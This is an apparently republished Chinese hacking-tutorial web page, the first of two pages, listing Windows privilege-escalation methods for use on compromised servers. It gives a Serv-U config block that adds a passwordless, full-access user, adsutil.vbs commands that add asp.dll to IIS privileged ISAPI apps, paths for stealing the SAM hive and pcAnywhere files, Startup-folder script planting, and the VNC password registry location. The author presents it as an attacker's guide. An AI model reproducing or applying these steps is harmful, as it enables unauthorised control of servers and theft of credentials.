网络安全参考 | UNIX参考 | GPS参考 | 无线参考 | 在线手册 | OSBUG.ORG | SUNNY-NETWORK.COM
网站地图 RSS订阅
高级搜索 收藏本站
Home | 业界动态 | 防火墙 | IDS/IPS | VPN | PKI | Honeypot | Hacker/Intruder | 黑客技术 | 破解技术 | 加密技术 | 病毒防护 | 木马 | 反垃圾邮件 | 反流氓软件 | 漏洞 | 无线安全 | UNIX | Windows | 安全编程 | 安全软件 | TPM/TCG | 数据恢复 | 企业信息安全 | 个人信息安全
 当前位置: Home > 黑客技术 > 文章  
黑客基础内容:21种RING的提权方法
文章来源: 天极安全 文章作者: 不详 发布时间: 2006-07-20   字体: [ ]
 

  好多都没有成功,还是发来看看,看看思路,呵呵

  以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过的。本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。希望对朋友有帮助!

  1.radmin连接法

  条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来米成功过。,端口到是给对方打开了。

  2.pcanywhere

  C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF文件,在本地安装pcanywhere上去

  3.SAM破解

  C:\WINNT\system32\config\ 下他的SAM 破解之

  4.SU密码夺取

  C:\Documents and Settings\All Users\「开始」菜单\程序\

  引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转

  进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空

  [USER=WekweN|1]
  Password=
  HomeDir=c:\
  TimeOut=600
  Maintenance=System
  Access1=C:\|RWAMELCDP
  Access1=d:\|RWAMELCDP
  Access1=f:\|RWAMELCDP
  SKEYValues=

  这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限

  5.c:\winnt\system32\inetsrv\data\

  引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行

  6.SU溢出提权

  这个网上教程N多 不详细讲解了

  7.运行Csript

  引用:运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限

  用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

  查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

  再将asp.dll加入特权一族

  asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)

  我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"

  可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

  8.脚本提权

  c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs

  9.VNC

  这个是小花的文章 HOHO

  默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password

 
推荐文章
·骇客学堂:灰鸽子VIP2006终极免
·黑客攻破SQL服务器系统的十种方
·黑客的攻击:WEB入侵的过程
·Web环境下SQL注入攻击的检测与防
·黑客经典教程之理解地址解析协议
·黑客经典教程之缓冲区溢出解密(
·黑客经典教程之缓冲区溢出解密(
·网络孙子兵法!黑客攻防也有三十
·黑客攻击常见方法及安全策略制订
·黑客技巧 使用Google黑掉Windows
 

 
共2页: 上一页 1 [2] 下一页
↑返回顶部   打印本页   关闭窗口↓  

Google
 
Web oldhand.org unixreference.net meshmea.org
热点文章
·黑客基础内容 DOS常见命
·攻防秘技:彻底防范网络
·黑客教程:黑客入侵个人
·很多人的Hack经历第一次
·黑客基础内容 IPC$空连
·黑客经典教程之理解地址
·黑客技巧 使用Google黑
·黑客攻击常见方法及安全
相关分类
相关文章
·黑客基础内容:菜鸟+Sa+
·黑客基础内容 DOS常见命
·黑客基础内容 TCP端口的
·黑客基础内容 IPC$空连
·网络孙子兵法!黑客攻防
·黑客攻击常见方法及安全
·黑客教程:黑客入侵个人
·黑客技巧 使用Google黑
更多...
 
 

Copyright(c) 2001-2008 OLDHAND ORGANIZATION, All Rights reserved.
Power by DedeCms 织梦内容管理系统
$Id: article_article.html,v 1.3 2007/02/10 12:00:37 yjs Exp $